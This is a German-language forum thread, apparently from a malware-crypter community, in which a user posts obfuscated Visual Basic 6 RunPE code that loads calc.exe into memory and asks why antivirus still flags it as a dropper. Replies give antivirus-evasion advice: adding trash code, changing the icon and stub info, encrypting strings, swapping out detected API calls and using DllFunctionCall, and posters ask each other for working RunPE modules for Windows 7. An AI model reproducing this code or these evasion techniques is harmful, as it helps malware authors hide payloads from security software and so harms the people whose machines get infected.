                WEDFghbtfvrde4567icvghbun dfgsrtshtgh675fght7ghtzr676, ByVal rtgzhRfDFfghd54567gTRhf5CFGV + .afasdfUI43wer23r4dfZRFi7fi6rfigu76tf + rtgzhRfDFf3467gTRhf5CFGV * 2, 2
                WEDFghbtfvrde4567icvghbun rtgzhRfDFf34dfzgh6TRhf5CFGV, ByVal rtgzhRfDFfghd54567gTRhf5CFGV + .afasdfUI43w234er23r4dfZRFi7fi6rfigu76tf + dfgsrtshtgh675fght7ghtzr676 * 4, 4
                
                dfgsrt43afd454frtz6asdasdf5ght7ghtzr676 = rtgzhRfDFf34dfzgh6TRhf5CFGV + rtgzhRfDFfghd54567gTRhf5CFGV
                             
                If dfgsrt43afd454frtz6asdasdf5ght7ghtzr676 >= rtgzhRfDFfghd567gTRCFGV And _
                   dfgsrt43afd454frtz6asdasdf5ght7ghtzr676 <= rtgzhRfDFfghd567gTRhf5CFGV Then
                    Call rtgzhRDFZGvtfcrd567gTRCFGV(dfgsrt43afd454frtz6asdasdf5ght7ghtzr676, dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrt43afd454frtz6asdf5ght7ghtzr676)
                    If Not dfgsrt4354frtz6asdf5ght7ghtzr676 = 0 Then
                        dfgsrt43afd454frtz6asdasdf5ght7ghtzr676 = dfgsrt43afd454frtz6asdasdf5ght7ghtzr676(dfgsrt4354frtz6asdf5ght7ghtzr676, dfgsrt43afd454frtz6asdf5ght7ghtzr676)
                    Else
                        dfgsrt43afd454frtz6asdasdf5ght7ghtzr676 = 0
                    End If
                End If
                
                Exit Function
            End If
        Next
    End With
    
End Function

Public Function sdf234sfdasdasdw4t4fsdfsdf3ascv42rfsdg()

End Function

Hier der aufruf:

Code:

Private Sub Form_Load()
    Dim bvData()    As Byte
    Dim iFile       As Integer
    Dim c           As New cGsPE
    
    iFile = FreeFile

        Open Environ$("windir") & "\system32\calc.exe" For Binary Access Read As iFile
        ReDim bvData(LOF(iFile) - 1)
        Get iFile, , bvData
        Close iFile
    
        c.dfgsrfghjzeztu56uzFf5ght7ghtzr676 bvData
End Sub

der jedoch wird nicht erkannt. kann den aufruf code entfernen
wird aber trotzdem noch als Dropper erkannt.

Hat jemand noch eine idee was ich machen könnte ?

Greetz

[KAS]

es wird erkannt wie du deine datei an die stub hängst veränderst du dies ist es ud...

[BlackCobra]

Es gibt doch ein Tutorial von Ebfe in dem alles erklärt wird. hier ist mal ein Link für dich. Edit sorry hatte jetzt gedacht du hättest eine kompilierte Anwendung.

[CYSER]

Trashcode adden icon ändern stubinfo ändern.

[inmate]

Die API RtlMoveMemory ist glaube ich detected.Da musste einen Ersatz für finden.
mfG

[locos]

Naja ich habe die RtlMoveMemory mal auskommentiert.
Und die Dropper detection war immer noch da.

Hat jemand noch eine RunPE version die auf Vista + Win7 läuft ?
Vllt. kann sie ja jemand posten.

Greetz

[inmate]

In der main sub alle Strings verschlüsseln , haste schon ne Section geaddet ?


Edit: Was ist das überhaupt für ein RunPE ? Kannste mal die unveränderte Version posten bitte ?

mfG

[locos]

Ich hänge doch noch gar nichts an eine Stub an.
Es handelt sich doch nur um das RunPe module und die den Win Rechner ausführt.
Normal schlägt AntiVir doch erst an wenn ich eine verschlüsselte *.exe an
die Stub anhänge ?!

Wenn ich das PE module komplett raus nehme, ist die Dropper detection weg.

Ich habe dieses Module von Cobeins Blog genommen:
http://www.advancevb.com.ar/?p=151

Wie gesagt, wäre cool wenn mir jemand ein anderes RunPE module geben
könnte da hackhound im moment offline ist.
Sollte auf Win 7 laufen.

Greetz

[inmate]

Nein muss nicht , du brauchst lediglich das:

Private Type tAPICall
ptsLIB As Long ' Pointer to ANSI String that contains Library
ptr3W3d5yRSclgKZsNfaPyEFD As Long ' Pointer to ANSI String that contains Procedure
lReserved As Long ' Just reserved...
lPointer As Long ' Pointer to the buffer that will contain temp variables from DllFunctionCall
lpBuffer(3) As Long ' Buffer that will contain temp variables
End Type


Private Declare Function DllFunctionCall Lib "MSVBVM60" (ByRef typeAPI As tAPICall) As Long

In ein Projekt schreiben und die compilte .exe wird als Dropper erkannt
Ich sagte nicht stub sondern sub.
In deiner Main sub alle Strings verschlüsseln und die Strings im RunPE
ebenfalls.

[locos]

Ich habe doch gar kein tAPICall bzw. DllFunctionCall
in meinem Code. Im RunPe module sind alles strings verschlüsselt.
Werde die main jetzt noch machen und dann nochmal posten.

Greetz